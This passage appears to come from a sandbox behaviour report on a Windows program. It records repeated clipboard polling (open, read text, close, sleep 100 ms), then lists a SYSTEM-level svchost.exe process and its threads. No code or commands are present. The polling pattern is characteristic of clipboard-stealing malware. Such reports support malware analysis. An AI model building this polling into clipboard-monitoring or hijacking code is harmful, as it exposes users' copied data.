0x21 [0103.920] GlobalLock (hMem=0x605520) returned 0x605520 [0103.920] GlobalUnlock (hMem=0x605520) returned 1 [0103.920] CloseClipboard () returned 1 [0103.920] Sleep (dwMilliseconds=0x64) [0104.091] GetOpenClipboardWindow () returned 0x0 [0104.091] OpenClipboard (hWndNewOwner=0x0) returned 1 [0104.091] GetClipboardData (uFormat=0x1) returned 0x605520 [0104.092] GlobalSize (hMem=0x605520) returned 0x21 [0104.092] GlobalLock (hMem=0x605520) returned 0x605520 [0104.092] GlobalUnlock (hMem=0x605520) returned 1 [0104.092] CloseClipboard () returned 1 [0104.092] Sleep (dwMilliseconds=0x64) [0104.263] GetOpenClipboardWindow () returned 0x0 [0104.263] OpenClipboard (hWndNewOwner=0x0) returned 1 [0104.263] GetClipboardData (uFormat=0x1) returned 0x605520 [0104.263] GlobalSize (hMem=0x605520) returned 0x21 [0104.263] GlobalLock (hMem=0x605520) returned 0x605520 [0104.263] GlobalUnlock (hMem=0x605520) returned 1 [0104.263] CloseClipboard () returned 1 [0104.263] Sleep (dwMilliseconds=0x64) [0104.918] GetOpenClipboardWindow () returned 0x0 [0104.918] OpenClipboard (hWndNewOwner=0x0) returned 1 [0104.918] GetClipboardData (uFormat=0x1) returned 0x605520 [0104.918] GlobalSize (hMem=0x605520) returned 0x21 [0104.918] GlobalLock (hMem=0x605520) returned 0x605520 [0104.918] GlobalUnlock (hMem=0x605520) returned 1 [0104.918] CloseClipboard () returned 1 [0104.918] Sleep (dwMilliseconds=0x64) [0105.121] GetOpenClipboardWindow () returned 0x0 [0105.121] OpenClipboard (hWndNewOwner=0x0) returned 1 [0105.121] GetClipboardData (uFormat=0x1) returned 0x605520 [0105.121] GlobalSize (hMem=0x605520) returned 0x21 [0105.121] GlobalLock (hMem=0x605520) returned 0x605520 [0105.121] GlobalUnlock (hMem=0x605520) returned 1 [0105.121] CloseClipboard () returned 1 [0105.121] Sleep (dwMilliseconds=0x64) [0105.296] GetOpenClipboardWindow () returned 0x0 [0105.296] OpenClipboard (hWndNewOwner=0x0) returned 1 [0105.296] GetClipboardData (uFormat=0x1) returned 0x605520 [0105.296] GlobalSize 
(hMem=0x605520) returned 0x21 [0105.296] GlobalLock (hMem=0x605520) returned 0x605520 [0105.296] GlobalUnlock (hMem=0x605520) returned 1 [0105.296] CloseClipboard () returned 1 [0105.296] Sleep (dwMilliseconds=0x64) [0108.468] GetOpenClipboardWindow () returned 0x0 [0108.468] OpenClipboard (hWndNewOwner=0x0) returned 1 [0108.469] GetClipboardData (uFormat=0x1) returned 0x605520 [0108.469] GlobalSize (hMem=0x605520) returned 0x21 [0108.469] GlobalLock (hMem=0x605520) returned 0x605520 [0108.469] GlobalUnlock (hMem=0x605520) returned 1 [0108.469] CloseClipboard () returned 1 [0108.469] Sleep (dwMilliseconds=0x64) [0108.664] GetOpenClipboardWindow () returned 0x0 [0108.664] OpenClipboard (hWndNewOwner=0x0) returned 1 [0108.664] GetClipboardData (uFormat=0x1) returned 0x605520 [0108.664] GlobalSize (hMem=0x605520) returned 0x21 [0108.665] GlobalLock (hMem=0x605520) returned 0x605520 [0108.665] GlobalUnlock (hMem=0x605520) returned 1 [0108.665] CloseClipboard () returned 1 [0108.665] Sleep (dwMilliseconds=0x64) [0108.896] GetOpenClipboardWindow () returned 0x0 [0108.896] OpenClipboard (hWndNewOwner=0x0) returned 1 [0108.896] GetClipboardData (uFormat=0x1) returned 0x605520 [0108.896] GlobalSize (hMem=0x605520) returned 0x21 [0108.896] GlobalLock (hMem=0x605520) returned 0x605520 [0108.896] GlobalUnlock (hMem=0x605520) returned 1 [0108.896] CloseClipboard () returned 1 [0108.896] Sleep (dwMilliseconds=0x64) [0109.098] GetOpenClipboardWindow () returned 0x0 [0109.098] OpenClipboard (hWndNewOwner=0x0) returned 1 [0109.098] GetClipboardData (uFormat=0x1) returned 0x605520 [0109.098] GlobalSize (hMem=0x605520) returned 0x21 [0109.098] GlobalLock (hMem=0x605520) returned 0x605520 [0109.098] GlobalUnlock (hMem=0x605520) returned 1 [0109.098] CloseClipboard () returned 1 [0109.099] Sleep (dwMilliseconds=0x64) [0109.218] GetOpenClipboardWindow () returned 0x0 [0109.218] OpenClipboard (hWndNewOwner=0x0) returned 1 [0109.218] GetClipboardData (uFormat=0x1) returned 0x605520 
[0109.218] GlobalSize (hMem=0x605520) returned 0x21 [0109.218] GlobalLock (hMem=0x605520) returned 0x605520 [0109.218] GlobalUnlock (hMem=0x605520) returned 1 [0109.218] CloseClipboard () returned 1 [0109.218] Sleep (dwMilliseconds=0x64) [0109.374] GetOpenClipboardWindow () returned 0x0 [0109.374] OpenClipboard (hWndNewOwner=0x0) returned 1 [0109.374] GetClipboardData (uFormat=0x1) returned 0x605520 [0109.374] GlobalSize (hMem=0x605520) returned 0x21 [0109.374] GlobalLock (hMem=0x605520) returned 0x605520 [0109.374] GlobalUnlock (hMem=0x605520) returned 1 [0109.374] CloseClipboard () returned 1 [0109.374] Sleep (dwMilliseconds=0x64) [0110.202] GetOpenClipboardWindow () returned 0x0 [0110.202] OpenClipboard (hWndNewOwner=0x0) returned 1 [0110.202] GetClipboardData (uFormat=0x1) returned 0x605520 [0110.202] GlobalSize (hMem=0x605520) returned 0x21 [0110.202] GlobalLock (hMem=0x605520) returned 0x605520 [0110.202] GlobalUnlock (hMem=0x605520) returned 1 [0110.202] CloseClipboard () returned 1 [0110.202] Sleep (dwMilliseconds=0x64) [0110.359] GetOpenClipboardWindow () returned 0x0 [0110.359] OpenClipboard (hWndNewOwner=0x0) returned 1 [0110.360] GetClipboardData (uFormat=0x1) returned 0x605520 [0110.362] GlobalSize (hMem=0x605520) returned 0x21 [0110.362] GlobalLock (hMem=0x605520) returned 0x605520 [0110.362] GlobalUnlock (hMem=0x605520) returned 1 [0110.362] CloseClipboard () returned 1 [0110.362] Sleep (dwMilliseconds=0x64) [0110.502] GetOpenClipboardWindow () returned 0x0 [0110.502] OpenClipboard (hWndNewOwner=0x0) returned 1 [0110.502] GetClipboardData (uFormat=0x1) returned 0x605520 [0110.502] GlobalSize (hMem=0x605520) returned 0x21 [0110.502] GlobalLock (hMem=0x605520) returned 0x605520 [0110.502] GlobalUnlock (hMem=0x605520) returned 1 [0110.503] CloseClipboard () returned 1 [0110.503] Sleep (dwMilliseconds=0x64) [0110.986] GetOpenClipboardWindow () returned 0x0 [0110.986] OpenClipboard (hWndNewOwner=0x0) returned 1 [0110.986] GetClipboardData (uFormat=0x1) 
returned 0x605520 [0110.986] GlobalSize (hMem=0x605520) returned 0x21 [0110.986] GlobalLock (hMem=0x605520) returned 0x605520 [0110.986] GlobalUnlock (hMem=0x605520) returned 1 [0110.986] CloseClipboard () returned 1 [0110.986] Sleep (dwMilliseconds=0x64) [0111.126] GetOpenClipboardWindow () returned 0x0 [0111.127] OpenClipboard (hWndNewOwner=0x0) returned 1 [0111.127] GetClipboardData (uFormat=0x1) returned 0x605520 [0111.127] GlobalSize (hMem=0x605520) returned 0x21 [0111.127] GlobalLock (hMem=0x605520) returned 0x605520 [0111.127] GlobalUnlock (hMem=0x605520) returned 1 [0111.127] CloseClipboard () returned 1 [0111.127] Sleep (dwMilliseconds=0x64) [0111.252] GetOpenClipboardWindow () returned 0x0 [0111.252] OpenClipboard (hWndNewOwner=0x0) returned 1 [0111.252] GetClipboardData (uFormat=0x1) returned 0x605520 [0111.252] GlobalSize (hMem=0x605520) returned 0x21 [0111.252] GlobalLock (hMem=0x605520) returned 0x605520 [0111.252] GlobalUnlock (hMem=0x605520) returned 1 [0111.252] CloseClipboard () returned 1 [0111.252] Sleep (dwMilliseconds=0x64) [0111.508] GetOpenClipboardWindow () returned 0x0 [0111.509] OpenClipboard (hWndNewOwner=0x0) returned 1 [0111.509] GetClipboardData (uFormat=0x1) returned 0x605520 [0111.509] GlobalSize (hMem=0x605520) returned 0x21 [0111.509] GlobalLock (hMem=0x605520) returned 0x605520 [0111.509] GlobalUnlock (hMem=0x605520) returned 1 [0111.509] CloseClipboard () returned 1 [0111.509] Sleep (dwMilliseconds=0x64) [0112.072] GetOpenClipboardWindow () returned 0x0 [0112.072] OpenClipboard (hWndNewOwner=0x0) returned 1 [0112.072] GetClipboardData (uFormat=0x1) returned 0x605520 [0112.072] GlobalSize (hMem=0x605520) returned 0x21 [0112.072] GlobalLock (hMem=0x605520) returned 0x605520 [0112.072] GlobalUnlock (hMem=0x605520) returned 1 [0112.072] CloseClipboard () returned 1 [0112.073] Sleep (dwMilliseconds=0x64) [0112.185] GetOpenClipboardWindow () returned 0x0 [0112.185] OpenClipboard (hWndNewOwner=0x0) returned 1 [0112.185] 
GetClipboardData (uFormat=0x1) returned 0x605520 [0112.187] GlobalSize (hMem=0x605520) returned 0x21 [0112.187] GlobalLock (hMem=0x605520) returned 0x605520 [0112.187] GlobalUnlock (hMem=0x605520) returned 1 [0112.187] CloseClipboard () returned 1 [0112.187] Sleep (dwMilliseconds=0x64) Process: id = "19" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 69 os_tid = 0x8cc Thread: id = 70 os_tid = 0x8bc Thread: id = 71 os_tid = 0x88c Thread: id = 72 os_tid = 0x87c Thread: id = 73 os_tid = 0x320 Thread: id = 74 os_tid = 0x6cc Thread: id = 75 os_tid = 0x42c Thread: id = 76 os_tid = 0x1e4 Thread: id = 77 os_tid = 0x760 Thread: id = 78 os_tid = 0x75c Thread: id = 79 
os_tid = 0x74c Thread: id = 80 os_tid = 0x710 Thread: id = 81 os_tid = 0x6d0 Thread: id = 82 os_tid = 0x6bc Thread: id = 83 os_tid = 0x6b8 Thread: id = 84 os_tid = 0x6b0 Thread: id = 85 os_tid = 0x6a8 Thread: id = 86 os_tid = 0x69c Thread: id = 87 os_tid = 0x698 Thread: id = 88 os_tid = 0x684 Thread: id = 89 os_tid = 0x678 Thread: id = 90 os_tid = 0x4a8 Thread: id = 91 os_tid = 0x46c Thread: id = 92 os_tid = 0x44c Thread: id = 93 os_tid = 0x424 Thread: id = 94 os_tid = 0x420 Thread: id = 95 os_tid = 0x41c Thread: id = 96 os_tid = 0x404 Thread: id = 97 os_tid = 0x14c Thread: id = 98 os_tid = 0x158 Thread: id = 99 os_tid = 0x3fc Thread: id = 100 os_tid = 0x3f4 Thread: id = 101 os_tid = 0x3e8 Thread: id = 102 os_tid = 0x39c Thread: id = 103 os_tid = 0x390 Thread: id = 104 os_tid = 0x38c Thread: id = 105 os_tid = 0x388 Thread: id = 106 os_tid = 0x37c Thread: id = 107 os_tid = 0x374